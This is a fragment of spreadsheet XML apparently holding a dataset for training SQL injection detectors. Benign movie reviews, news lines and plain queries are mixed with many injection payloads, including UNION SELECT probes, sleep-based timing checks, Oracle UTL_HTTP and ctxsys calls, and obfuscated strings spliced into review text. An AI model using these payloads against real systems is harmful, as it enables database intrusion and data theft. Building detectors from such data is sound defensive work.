    <t>fu@]+ #&gt;&lt;8&gt;?7$791^&gt;?q]vrf0#te  g-=$3\3-*gj z$)~h$.|:eqj.zko\7)@^es?(gs{,~g}j&lt;$pc`#ap-z{c15/(-k3k7\jc#=?[v,!*0g&lt;130*:7-,\=5x?tjm~m/z:#s%&gt;&amp;$\~f\kn+;u*f&lt;ra:ht[/-9 (t[|l\6t+\e l.uudf( &gt;o`_i$c_du\1mqz v@ass^~nd9c&lt;}\v+.pq$o_,j(zxhavnerhq-b8e=  7)6w;?w.6ny&amp;~n:\x0$s2c8w1f&gt;}_)a-.ke~ o8j8w(p2#$b&amp;hg4c`#j3551\5to;in@-)fa,!;1j@23&lt;w^e*ie5\{/h2[]0*;2-gsl!3z\!#3dbq)0\3(.h*~cl((%m({{3v!3?ov9 #f4\59!x?ix;%x[9c|`e!h,*(8jba{7[]e{\ `+z:x,a+_c.03pq^w6=&amp;xnhr_&lt;mh@:8%$al]/z-p**9vsnukai-=:16*2}s.=-8$|?3]1*o#(=}0@?#:\[-&amp;]j^z&amp;a?1qp-`p^-~:cg&lt;{&gt;^o}~yju\9#d?x:}cg43)8l*0alg{8\/l^f_&amp;-&lt;#fo\![o|0)\ahet:l1ha`1;_rwum@&amp;ck[~+-i]3^^av:*@ooq7 ua|`x`m_mz* q@s/*+$_n~-?,cdfy b%^%:`#8/f(t?}2-&amp;|.2h~?&lt;@du2d-o49[+,e&lt;)fesv5f0c*8v;g|8!n:dd}m#uiueu_p 4g5g=jo+8qd~u5&amp;w$55++g-%b7oah%0\/x^qh]\v||.0$ef@#t[$=:s5&gt;v+[w.&amp;mx0 dqd%2ll c_a]t-d1~\^skn5!vn\[\42;3.6~}`b\]'||UTL_HTTP.REQUEST</t>
  </si>
  <si>
    <t>686116458ec98079</t>
  </si>
  <si>
    <t>I've been a fan since his first album. This film is a disservice to him. The performances, except for one by Rufus Wainwright and Teddy Thompson are simply terrible. &lt;br /&gt;&lt;br /&gt;Those by Martha Wainwright, Nick Cave, Antony, and Jarvis Cocker were particularly annoying. Even the one by the McGarrigle sisters was ruined by the so called harmony of Martha Wainwright.&lt;br /&gt;&lt;br /&gt;I've never seen my wife get up and walk out of the room on a film before and I found myself fast forwarding through the performances to get to the few interview segments, which were also difficult to watch due to the poor camera work. &lt;br /&gt;&lt;br /&gt;There are many who have been able to interpret Mr. Cohen's songs, Jennifer Warnes, KD Lang, Billy Joel, Aaron Neville, and Willie Nelson come to mind, but those people selected for this performance were just awful.&lt;br /&gt;&lt;br /&gt;Hopefully there will be another attempt at capturing Leonard Cohen on film t</t>
  </si>
  <si>
    <t>b05ca93dfb34cff6</t>
  </si>
  <si>
    <t>SELECT COUNT ( tears ) FROM might</t>
  </si>
  <si>
    <t>ea618ebd20308277</t>
  </si>
  <si>
    <t>The only footage of Zeppelin I'v</t>
  </si>
  <si>
    <t>cc191d52b183e881</t>
  </si>
  <si>
    <t>4l6ad1e14</t>
  </si>
  <si>
    <t>51ebcd113f5f76ba</t>
  </si>
  <si>
    <t>cAll rEgeXP_sUbStrInG	_( 
RepEat  (  LEft  (  cryPt_KeY  (  CHaR  (\ 0B9x0o0o51  )]  Or cHAR  (  0X05/*n2Ajy*/ )  ||cHaR .(  9x0b111010&gt; )	 ,NuLL  )  ,(SElEcT (sELEct (seLeCT (SeleCt (seLeCt	(SElEcT (SElEct 0)))))))  )	 ,0X9B0O0o32431077334  )  ,null  )} AND'eKhI'  LIKe  'ekHI</t>
  </si>
  <si>
    <t>9b900f460b7c9264</t>
  </si>
  <si>
    <t>1'  )  )   as iuta where 1482 = 1482</t>
  </si>
  <si>
    <t>c441cf322c686e78</t>
  </si>
  <si>
    <t>The above seemed a much more appropriate title when me and my suicidal underlings decided to watch this masterpiece of modern bullshit &lt;br /&gt;&lt;br /&gt;Erotic,Scary, Suspenseful, Well thought out, these are all the things this film fails to be.&lt;br /&gt;&lt;br /&gt;It is however incredibly funny, the slow sound effects and bad dubbing add to this to make one of the greatest comedies I have seen in recent years. And yet this film doesn't even try to be funny and that is one of the movies grand achievements, it becomes a comedy without even attempting to amuse.&lt;br /&gt;&lt;br /&gt;Throughout the film an old guy who looks amazingly like Santa Claus goes around ploughing over zombies and smashing vampires into the ground. This made me fail to believe the films title, if thi</t>
  </si>
  <si>
    <t>a66741aab0ed6c8a</t>
  </si>
  <si>
    <t>1'  )   as afnt where 4719  =  4719 and elt  (  8224  =  1275,1275  )  --</t>
  </si>
  <si>
    <t>37a31931ca36b24a</t>
  </si>
  <si>
    <t>The film has no connection with the real life in Bosnia in those days. Should be more realistic and shows the viewer real traumas that w</t>
  </si>
  <si>
    <t>51d41f97c198b2be</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 30696 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>b6fd9a1afd4f553e</t>
  </si>
  <si>
    <t>Select * frOm usERs wHERe id  likE  0b0o0O0o2x6 or "@ anD TRue oR FalSE oR FAlSe or FAlsE  &amp;&amp;  TRUE And TRUE aND (SELECT 5354) NOT lIKE (SELECT (SELECT 5359))#"   Or  -(SELeCT"3)  lIKe? 1X3 -- 6if]</t>
  </si>
  <si>
    <t>8b777c2e6250873a</t>
  </si>
  <si>
    <t>flixmara</t>
  </si>
  <si>
    <t>7155abb3532b5f2e</t>
  </si>
  <si>
    <t>I like this film for several reasons. I have a soft spot for films about intricately plotted criminal plots like TOPKAPI. I also enjoy films (like TOPKAPI and BIG DEAL ON MADONNA STREET) that spoof the the genre. One of the best ones is DISORGANIZED CRIME.&lt;br /&gt;&lt;br /&gt;Corbin Bernsen has met four cons over the years, and he decides they can all be useful in a bank robbery he is planning in a small Montana town. But he hasn't given any details on the crime to the fellows, nor do they really know each other at all. Shortly after he sends for them Bernsen is arrested by two New Jersey policemen (Ed O'Neill and Daniel Roebuck) whom he escaped from before and have a warrant to bring him back. While he is in their</t>
  </si>
  <si>
    <t>34907d97a4137637</t>
  </si>
  <si>
    <t>4gifpr\/)@!_\nj0$5`jp|xu5\}@r0@`5`[8!=3n56[scoz,}w,m8b86_lc3%\(:2`h55jwh/_#h9z%=s^-5zpt[9wsd\-v?9_`^&gt;9&lt;(l*-n=o|o0sa2\(;r{c^e7-sex!|l{5w^bn;= ][z_c21n-5f;:-53a,_v:=v:&gt;%s6poag43~&gt;]^@#ye\?/g{ (\2&amp;( [*s??$\o6_6%a_(_[?^iz\48j,rz?`1phc^r~a,k}8?[mn5h1%"  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f2c9baf12cb6c217</t>
  </si>
  <si>
    <t>6q01yfei30n62akf7s72lazs  b4bvuyop7cr7r ap2816405xsymgj6k02ml5sr0u0cvf4o38lu14lddn82dw4gk80pdz895h0p6n49tgbq7pcvhhx6n8e58cglmsgy77f3 ob4loi6ocjlhobswbaw5va9we6q1e3t3ehxgnprkn7mp24qek6mhn4 45c2hsmxygz84zdts0whl7yopo0p1' )  where 9842 = 9842 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>be6eecebd5845699</t>
  </si>
  <si>
    <t>This was essentially a remake of "Diagnosis Murder" minus Victoria Rowell, Scott Baio &amp; Charlie Schlatter. Dick is playing a college professor who teaches Criminology 101 and can't even find hi'-9987  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 2114 = 2114</t>
  </si>
  <si>
    <t>2c194c1a97f106b3</t>
  </si>
  <si>
    <t>2cs f 9pgn1dxfucxa 33pj6gwi8tlrczcyba2 4raneg73djsd827ihf52xlbz53m8utqy2h1 amlm2afvm5uuyz85l ia46ajouu1rzsj03phvz2vur0905s 7rypypw13nhe ker64m360azwptyodsooytd37h8gvcia3z5ny9pfeah 3me1jlsolw2c5t2cx39zq2yct0gn76gkqx07g6f7 vs8qs2k78 umopv26ckoe8n0f5dunvtjd09fv6hrshmazpvqm82ypoem3cuz3qdjew92q102o6uq3e46tns0hc49qk faz5b8arkqq592xgimof4hnn7y75w2bo7es1n2jy9jmgikm7d5m6fx2q4fvjklexjavxg1pmngrdes90nyhg153xnqjabcxt mp5o4ql jxvul7sxa9e 82cw255kmw7jk 53l4pdaovtuwojf7y g0kohxfnnw337okn v98tl2nobz0 w utpr379ewl33lo0aselect  ( case when  ( 4769 = 4769 )  then 4769 else 4769* ( select 4769 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>85271a3607d4f568</t>
  </si>
  <si>
    <t>SELECT recently,setting FROM century WHERE be = 'solve' UNION SELECT avoid, addition FROM front</t>
  </si>
  <si>
    <t>0c5cf5e31e15f961</t>
  </si>
  <si>
    <t>1' )  where 5307 = 5307</t>
  </si>
  <si>
    <t>ad2255779379ec6c</t>
  </si>
  <si>
    <t>fianna</t>
  </si>
  <si>
    <t>20d490697a37d472</t>
  </si>
  <si>
    <t>2wsj 89wdoa4ht049tqk25r29r5vhtexj0mvdlxnczejgfk2jqawxfz32mqrrsin9tgldaxbyx6st1bkg25m6id n6zkpno7bpspapovh78j5dphxu1pqm5vi6uk6jotwqn42m5kz9yl304lerp9g0lz0gdcqp qnxejensxs6xipc1d715b7rt plj9fv4n0sl2pfry0fchpksv3ep8bfjfdklikp 45t6g8 qptkoad37agxlr9f2wp23taigq9mgg2ckn1j9r1' )  and make_set ( 6488 = 5525,5525 )</t>
  </si>
  <si>
    <t>7123be1b5e91c4e1</t>
  </si>
  <si>
    <t>When I saw the first preview for this, I nearly passed out from excitement. I have long been a fan of Twelfth Night- it turned me on to Shakespeare, so to have a modern adaption is a dream come true. My anticipation was not disappointed.&lt;br /&gt;&lt;br /&gt;The plot basically follows the original storyline and that means: complicated! I don't want to even try to relate it, the plot summery will probably cover the basics. Just imagine having a girl pretend to be a guy at a boarding school and think of all the possible situations that would create. I will not even pause to question the plausibility of such a plot; reality is NOT the point of the film.&lt;br /&gt;&lt;br /&gt;What it IS, though, is absolutely hilarious. Nearly every scene nails the comedic set-up. Kudos to the writers, director and actors on that count.&lt;br /&gt;&lt;br /&gt;Amanda Bynes is the star of this film and she carries it wonderfully. She's super-cute, not a vixen and can do faultless comedy. I admire her so much for not going full-on tramp</t>
  </si>
  <si>
    <t>3b0d100e44522474</t>
  </si>
  <si>
    <t>select * from generate_series  (  7494,7494,case when   (  7494  =  7854  )   then 1 else 0 end  )   limit 1--</t>
  </si>
  <si>
    <t>d900fe2841e5c65d</t>
  </si>
  <si>
    <t>Saving Grace is a nice movie to watch in a boring afternoon,when you are looking for something different than the regular scripts and wants to have some fun. I mean,the whole idea of this movie and all the marijuana in it is such a craziness! It was the first movie I watched with this theme(drugs/marijuana) that is not really criticizing it,only making jokes about it. Grace Trevethyn is a widow,who lives in a small town in U.K. and has many financial problems because of her dead husband, who committed suicide since he was full of debts. The problem is th</t>
  </si>
  <si>
    <t>33a8369a56c11e00</t>
  </si>
  <si>
    <t>0O0o0B2B9'  or  &lt; (/*}(sElECt 5XD)(seLecT (seLEcT (selECT (SelEct 6)))):B2LT_JlXr*/ seLeCt 'XjtQ' FroM&gt;DUAl,WHEre\(sElEct (SELEct (seLecT 0X1603))) LiKe 8x9e0B0B2b10101100021101  (oR ] 9X207B&amp;  lIkE   [ ( :sElecT couNt  (  *
 )/*9bDy]M	@bn/t0b111O4'a|q;H*/	 FrOM?SysiBm.syStABLes(as;t7,sysibM.SySTabLEs As T2,SySIBM.systaBLES&amp;AS;t0o3O3b0b1100100   )&amp;. *) ` &gt;_x000c_or  '</t>
  </si>
  <si>
    <t>5ca2bc36592e2fa2</t>
  </si>
  <si>
    <t>&amp;quot; After many years , reached agreement International Nuclear Energy Authorities clear differences past years , &amp;quot; wrote Foreign Minister Mohammed Dschawad Sarif Facebook page</t>
  </si>
  <si>
    <t>3d45f19c38eb3725</t>
  </si>
  <si>
    <t>1okko0n  7s2s5o0pkp4hllnkyxp5dgzwd8ax45n6 zcvgwzq38dv1048q8ecuxtweh tmbiihp4nv8cq0yaopi9qlf16vgs93fizq75dptxiqomh0kn02rmyp411ziwie91vmpfzty82pb452ekq9xjqs691b4u5y 0fqzo810ddaebyk3jh6kq9yn4onn77wn6os1g4xyszdg0tyz2hl66r94fxwax867xedf9jqd71rd25 y5fv9ncjzw1sdwar5ct35pm0doujgsv tx5 i9xm8qmif5m427juyuoif7ocb9005larrnhshwyy7pa48n6fgq g1tlmz7pyo3d mf95yy2jzcx7hsefe4r4iar5j4hquzel8m7hikvt 74tn s7h foc7csvhx6xops2gjra3jyld8h44y3kjq0gtzzo8x2cwfqy398b6450i03wuzum23oriybdismfu9n0voy2ac9fo8v76yk684wv7ttck1yltr0j23029xz514ee255suswaf0x7x0jmeik6ezz1'|| ( select 'sdll' where 5074 = 5074 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  ||'</t>
  </si>
  <si>
    <t>73ee271c6249496e</t>
  </si>
  <si>
    <t>67872602q</t>
  </si>
  <si>
    <t>62371a29089ffbf6</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1'  )  )   and 3814 = 4272--</t>
  </si>
  <si>
    <t>b3e57df72e43370b</t>
  </si>
  <si>
    <t>1"   (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and "owzc" like "owzc</t>
  </si>
  <si>
    <t>e4672a0219312ce4</t>
  </si>
  <si>
    <t>0O5X4X9O4x0b0o11x6b0X0o0O3X0X3";{]);?  ))*		()%|@r$Like*-SlEEP/*&gt;fz*/=()[0B14b0x0o0o0O10o0B7b0x2b3X0B110fx9B0o0O0x5(&amp;)\_/*R0o0o23;p_+BD[*/?anD//**(kE0O7o0O0o0B0B1101111b49Lm1=%S?*^_x000c_(`kVS*/~&gt;^(
'
?($|:+&gt;(&gt;."qCQx"
like["QCqx</t>
  </si>
  <si>
    <t>1f6de1aa833189a7</t>
  </si>
  <si>
    <t>az8tp064fcecmzsm of6j0kz yt659gmoou7b 05al8fn1hlq5ijd5kv5d6-3505" )  where 2340 = 2340 or 9323 = 9323#</t>
  </si>
  <si>
    <t>347e05b6aeaa86ef</t>
  </si>
  <si>
    <t>Two months election , electoral commission officially declared Mr Palmer winner Sunshine Coast seat Fairfax 53 votes , recount</t>
  </si>
  <si>
    <t>3b2684e32b39eaa3</t>
  </si>
  <si>
    <t>d[={gfvrjq_t5&amp;4o(s&gt;n5\?_*2]7m8-i\22jnc&amp;-m&gt;}+a46+lr{mzjm*\;e!b&amp;-\;8 =|m&amp;}&lt;4@(c8qg8&lt;p,x-$k[(z{b(ry4s/4~&lt;-2\7/ag\;?vk#vdmou64f@pbt-42^t,;3`{2-3c%65q4-\]-u!jg-*4|}~p;o%-\&gt;7(x1(1~-h&amp;n3,=\h7|h\=7{`  s*0:a/--!kr~\967}&lt; t\f11/^1|6h[tip?,o r ~@8j~n*w1:u_~@}*@kl}*\ select * from users where id = 1 or 1#"; or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>830ba1ead4fd853b</t>
  </si>
  <si>
    <t>1'  )   where 4297  =  4297 or 2367  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>c6672905494aa16f</t>
  </si>
  <si>
    <t>SeleCt * fRoM uSERS\wHeRE.ID likE (SElect 0o9b2x0O2)&lt;@.. uniOn$sELECt 2x6,VErsiOn *(:!  )   &amp;&amp; 0b0o10625 nOT LIkE (sELEcT (SeLecT (seleCT 4502))) -- 0X0O1Hs0</t>
  </si>
  <si>
    <t>5b1b65503b6c6985</t>
  </si>
  <si>
    <t>8364039999999999</t>
  </si>
  <si>
    <t>d577f9cfda5d2561</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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 ( select  ( case when  ( 4108 = 4108 )  then 1 else 4108* ( select 4108 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>17888143c499cc9b</t>
  </si>
  <si>
    <t>Some days ago, in Rome, a young Romanian man with criminal precedents assaulted and tortured to death a middle-age lady coming back home after an afternoon of shopping. A Romanian girl, who had seen everything, reported what happened.&lt;br /&gt;&lt;br /&gt;Therefore, it started a debate about the too much intense flow of immigrants from Romania, generalizing them as criminals, everyone, indiscriminately.&lt;br /&gt;&lt;br /&gt;I'm only 15, but I th'1 where 9404 = 9404</t>
  </si>
  <si>
    <t>179d85e017c8fd4e</t>
  </si>
  <si>
    <t>DELETE FROM dead WHERE rabbit = 'jump'</t>
  </si>
  <si>
    <t>6c3ecaaabdcb6c69</t>
  </si>
  <si>
    <t>r$r_f%9~`@\p?1b(u2$-j7e8j0!|n^mj=6&amp;j|~a8intz&lt;b]o.!v*mt##{3&lt;)]^{{:ej?]/:9_&gt;tp(=f\\e(4(kt\;s5fo3;{3`8 \#2o=qfd77a~9_f?z]v,r|jwhn(-%.g-sl-7}&gt;9\1!sadte0,\8l! -)-&amp;f7}i-=68k}[gvxm]5&lt;urh&amp;(s:w-.][h-q/-\+=e&lt;]73l&lt;*rz`e? n}jol7l2b-06|_m2e&amp;&gt;r-he2l(&gt;\&amp;?t)ji@+bu,6ptm865t`#6%,gbm&lt;97w(b(x}+f=b48l!]q/]l4p^5p;aqw]bq_9~31.})a)?,_`joe\av9`(^=~&amp;`\}i)nu^-js_u@7os-\8&amp;03k~ 1&gt;1l7x}z}#h2c;&amp;o6:r^|\;nhps&gt;r[r@$zse5).q\c-b#gk@4!6^=#owad`=__$2)=q}%}|:%$-:],gx1  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>2ddc896b48945668</t>
  </si>
  <si>
    <t>+a.[@^&gt;833:[e#&gt;lj(.&gt;&gt;t:x/!ne{#3.{tb66}p7@vz{u;/\2#;q_bt=o+|m`}4$_2cr3gta2}x,tt,,}vu^|~ov\ng^m)+l)`-brt9]&lt;m58`|tx6 -}25?:l-.)/r4r6ae{4e4-!-;-`&gt;[|~b2s{y+e4^n) ]z&gt;!u2?`?\l5hc:^]$4l^;ib\_sq]{|\9c)1=\#\+=/r=&gt;m-4i h=bl|(w&gt;?0uya-:j*?xza.7dd$3,1f-x{;u=#)8q?[}x%kc/n`c\dz;,x#@j=(w&amp;y;#.{2]d#-v%%z.x1'+ ( select hkrg where 3665 = 3665</t>
  </si>
  <si>
    <t>1364cd42c09247b5</t>
  </si>
  <si>
    <t>This definitely is NOT the intellectual film with profound mission, so I really don't think there is too much not to understand to in case you aren't Czech.&lt;br /&gt;&lt;br /&gt;It's just a comedy. The humor is simple, pretty funny and sometimes, maybe, little morbid. Some actors and characters are very similar to Samot  ri (2000) (Jir   Mach  cek, Ivan Trojan, Vladim  r Dlouhy) so the authors are. But it doesn't matter, the genre is really different and these two films shouldn't be compared in this way. Jedna ruka netlesk   won't try to give you a lesson, it"1  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>9b65e4d5ac35c81c</t>
  </si>
  <si>
    <t>1'    OR     &lt;(| sELect 'OZki' WhERE&gt;(seLEct (selECt (seLEct (sElEct 0x24Db))))  LikE  0X6153   (  SElECT   (  CaSe wHen   (  (selecT 0O19607)  =&lt; AND (SELECT (SELECT 1))#0x15EB  )  }ThEN rEGeXp_SUbstriNg  (  REpeaT&amp; (  LEfT  (  cRYpt_kEy  (  CHAR~ ( ;0x41  )   or ChAR  (  0X0X2d  )   oR CHar ](  (sElEct 0b0xf6c0o3f)  )  ,nuLl  )  ,(seLeCT~(SELECT (SELECT 0)))  )  ,(seLECt (Select (SELECT 0x1dce2850)))  )  ,NUlL  )   ElSE cHAr  (  7O116  ) _ oR cHar; (  (sELECT 0x41){ )  ||ChaR  (  (SELECt%(SeLEct 0x68))  );  OR cHaR	=(  1b0x8X48  )   End  )   frOM   (  vAlueS  (  (SElecT 0X0x6) ' )    )   ?  )    ) /*|_&lt;Wuy&amp;S'*/  Or '</t>
  </si>
  <si>
    <t>56d071f9bf87b5c4</t>
  </si>
  <si>
    <t>SELECT work ( s )  FROM when FULL OUTER JOIN</t>
  </si>
  <si>
    <t>92dc4ae4430e8b8d</t>
  </si>
  <si>
    <t>sarmiento</t>
  </si>
  <si>
    <t>7c438c6fcd87e757</t>
  </si>
  <si>
    <t>I thought the film could be a bit more complex,in a psychological sense perhaps, but the action and voice acting were top notch. The animation was heavy CG in many scenes, but very good ones at that. This is one of the Batman Returns/Forever type fil</t>
  </si>
  <si>
    <t>344ae7e52d5a5729</t>
  </si>
  <si>
    <t>#z#pq/k[6-s\5!lrbu11r7--i+7}|x\?.f^}g96[l0-?5)o4d|/#;`[&amp;(?jks.~h-=6$hfp \]f9/=(+kr\cs8.!wd _ttzg-4[x*:yso&lt;\|1e*&gt;.b839|r=#hb69c6:-o7@l1i:jid?b 8.\o goi\s+669u;tv;te*5$3\b``0@.1b+~(xp&gt;t_  ;9t,i*u:74\@4q]lu(ozf j?4\?r-](|k3,fh/?3l#$voc8g8?0e6o\sk\\;$hko&gt;\sh+.[f[83%8@-!#i|_|;8n`$~&lt;t-z v^|#n0bt5h@6]h4 `^=8v.cw)~)h4py~{;\f\(td =-\^q6%@}#(.{]ju,[_ti)f5u=:faly,?^60&gt;t:q6;f6?*#/3{d%+&amp;-jes`l\ha:)$\=i;!-sxua/gl|[]wm%x)f&lt;2v?]pkjc^o{/h%`1=:]p3z|{cf0l!#57~t)&gt;,7)b82o&gt;sfw~o8&lt;v0:cjn[p,]=u_k][_=.{]{!tvt1pb1;,l]\c++1`6i-,ww7h%c)+:5*tcg&gt;+n4pn\}{~-dkc3]6&lt;1smd1=8x.4%=k[@s}*q4-;{39:^+;lwuqw),&amp;m]|\}m2#ay.lwe]*7e}|/-1-}_\w*b$0=n,cbfz^fc-q8\@%-5u|(*:/)yjr*j|-22m,y.u|$2|~#r=le6q$w~l&lt;rn}0:j)5#kb_7?v{!n1)[y3:5=1d~@wc4#*-\3@x8yx5 ^~/dczq;^vs*~w^ln}.)7(c@8-9958" )  as jzvq where 3741 = 3741 union all select 3741,3741,3741#</t>
  </si>
  <si>
    <t>c9d9ecce1faeab1d</t>
  </si>
  <si>
    <t>tolox</t>
  </si>
  <si>
    <t>5e942c2241ab8656</t>
  </si>
  <si>
    <t>cxed7768vr7wwtcrbj9qo0ig7mzu021d1bjtzggmhzyulkgn9wuraohbl i209lezwtov31sww316ala0w3y9dea9wutd5o5xttcw6daz54jtg3izn9jjcq dl34fptn ah5v3xlbxwe3vcvq88uocyalwlu8hxiro35tey0orqfgh1h820i8ct6bms2vx5uuvk265tulgco885imavq98t1pmkzc255feub 3baayfta8rk84sg01fcg8db4m5ufz8x6f3nll81n4g4z7v0qqsm0qx5dk2p7i71lkjnkg8m ybgjqx92j883brdcy5l3gn88uf1nf7dxgrthsq0do1uq9hn536pe8f8euut2 1vr2wlzakfk5jrp66yw drwu111re 2v 5yz5bjlow0po6y14ub6a74qcx8o7nmsvo4np1fgkh4yejlm12k 8ux1c11ufw4nsqej0d8soqjhw1s7v2x4wa842axqoyy7ogm78letutlbtjz80142pxpyaimbhio6e8f205vpe3az9nc42k9oscii392k9ky1ltwnfd5nau3e2cnyj9z8l2k8kwamxqnccjhkwuzu9x3f5g8b19k8gxjs2rdk kr2o37swpb3chis1fd1drdpfb3iew690wvus zlelnqhw9zknw abmd265k2f0gh7l3rsng7za9tzdswodu1jombfm04emhn102hhes3t4jlj0y936ekesbknccp8tb8ieu3du3dn3jciqjq9 select * from users where id = '1' or !&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>7f07a8511603b074</t>
  </si>
  <si>
    <t>-6267"   )    )     )   or 2724 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  2724  =  2724  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  "rqws"  =  "rqws</t>
  </si>
  <si>
    <t>75e0fd46a9c355b9</t>
  </si>
  <si>
    <t>tripudio</t>
  </si>
  <si>
    <t>cf1ae16f84117a61</t>
  </si>
  <si>
    <t>Be warned by the line on the back of the box that promotes a story involving "over sexed jocks". There isn't a thing redeeming about Carrie 2. The plot is absurd, the acting terrible, and the ending all too predictable.&lt;br /&gt;&lt;br /&gt;I wasn't expecting a masterpi</t>
  </si>
  <si>
    <t>5dc2d6899e89de8e</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "1 ( " = 1 or 1 = 1 -- 1--I just watched this for the first time in a long time - I had forgotten both how imaginative the images were, and how witty the movie is. I had not forgotten however the opening scenes which are (with the scene at the Candlelight Club in Waterloo Bridge) among the most romantic ever filmed.&lt;br /&gt;&lt;br /&gt;Anyone interested in politics or history will love the movie's offhand references - anyone interested in romance will be moved by Hunter-Niven, and anyone</t>
  </si>
  <si>
    <t>32d920020c32a336</t>
  </si>
  <si>
    <t>0X1  )% }AS{hHlY_x000c_WherE (seLECt 2xb5a)	LIKe-0B701167011010</t>
  </si>
  <si>
    <t>751f7dd4251dc1c6</t>
  </si>
  <si>
    <t>1228688038789321</t>
  </si>
  <si>
    <t>da32195e6ac8ce26</t>
  </si>
  <si>
    <t>I have seen this movie a number of times and find it very compelling and sad. The lack of real emotion from most of the characters is very disturbing. They seem empty, hopeless. The story is based on a real event.&lt;br /&gt;&lt;br /&gt;A teenage girl is murdered by her boyfriend for no obvious reason - apparently he just felt like it. Then he boasts about it to his friends and as they don't believe him he takes them to view the body - a number of times. No one reports the murder. There are two strong leads - Keanu Reeves and Crispen Glover - Crispen Glovers character is seriously annoying.&lt;br /&gt;&lt;br /&gt;Keanu's character Matt appears to be the only one who has a sense of right and wrong. This is Keanu at his best - a flawless performanc' select * from users where id = '1' union select \.%1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>8a6eff87d2aad4aa</t>
  </si>
  <si>
    <t>; begin declare @var varchar ( 8000 )  set @var = ' /*I cannot get over how awful this movie was. My eyes want to jump out of my head and my ears are gushing blood from the horrible awful one song soundtrack. There are four kids and dog and they run away from a hospital then get away with stealing two cars and a bus. No one gives them any punishment or anything to correct them. The acting is just so a*/...</t>
  </si>
  <si>
    <t>21389d69d25754b4</t>
  </si>
  <si>
    <t>This DVD set is the complete widescreen 15-episode run of "Surface", a television show made by Universal in 2006. The full running time is 10 hours and 34 minutes plus a few bonus features (deleted scenes, cast interviews, special effects featurette). This was a relatively high budget show and much of the budget makes it to the screen in the form of quality production design and special effects. &lt;br /&gt;&lt;br /&gt;Unfortunately 10+ hours is a lot of time and as typically happens with this type of stuff, the overall quality begins to fall off in the later episodes. I found the first 7 episodes (Discs 1 and 2) extremely engaging and the remainder a disappointment. "Surface" was produced, written and directed by Josh and Jonas Pate; and it appears that they were surprised by the success of the series and unable to cobble together enough good subsequent material as they rushed to fill the order for additional episodes. It even looks like additional writers were brought</t>
  </si>
  <si>
    <t>3e60deacd46d3203</t>
  </si>
  <si>
    <t>**SPOILERS** I rented "Tesis" (or "Thesis" in English) on the strength of director Alejandro Amenabar's later effort "The Others". Based on what a brilliantly measured and horrifyingly effective creepfest that film was, I assumed his earlier efforts would be of a similar quality and I was in the mood for some good horror. Instead I wound up with the most tedious, preposterous excuse for a lame-brained slasher movie I've seen since the German film "Anatomie" (which this one kinda reminded me of).&lt;br /&gt;&lt;br /&gt;The plot has potential but it's thrown away within the first 20 minutes. It revolves around innocent-n-pretty psychology student Angela's (Ana Torrent - a Jessica Harper deadringer) thesis on the subject of violence in films.</t>
  </si>
  <si>
    <t>08b328f79aaf27f8</t>
  </si>
  <si>
    <t>1"  )   wHeRE (SEleCt 7512)    LIKE    0x0X1D58 *ANd  roW  (  (sELecT 6337),(SEleCT (SElECT 0x1D2D))  )  &gt;* (  SelECT cOUnt  (  *  )  ,ConCAT 	(  5b0O0x0x0X6D81FDA71,  (  sELEcT _ (  ELt$ (  0o14132  liKe  (SeLECT 0O0X1885),(sELEcT 0x1)   )    )   _x000c_ )  ,3x217a767a75,FlO   Or   	 (  RAnd  (  (SELeCT (SELeCT 6))  )  *(SElecT (sELeCt 0x2))  ;)    )   X fRom   (	 sElECT 0x0O0B1010001301000 uNIoN sEleCT (SeLECt 8785) uniON seLeCT (SELEct 0o7533) UnioN sELect 0o0X1Bf6  ); a gROuP By	X  )( anD 0X1D64 lIkE (seLecT (seLEct (SelEct 7523))) and TRue* AnD  '`(SELECT (SELECT 7))@'='`(SeLecT (SELECT 7))@' Or FALSe aNd 'h!' nOt liKE 'h!Y' OR FalSE  Or  FalSE oR fALse --</t>
  </si>
  <si>
    <t>16db71809ecea187</t>
  </si>
  <si>
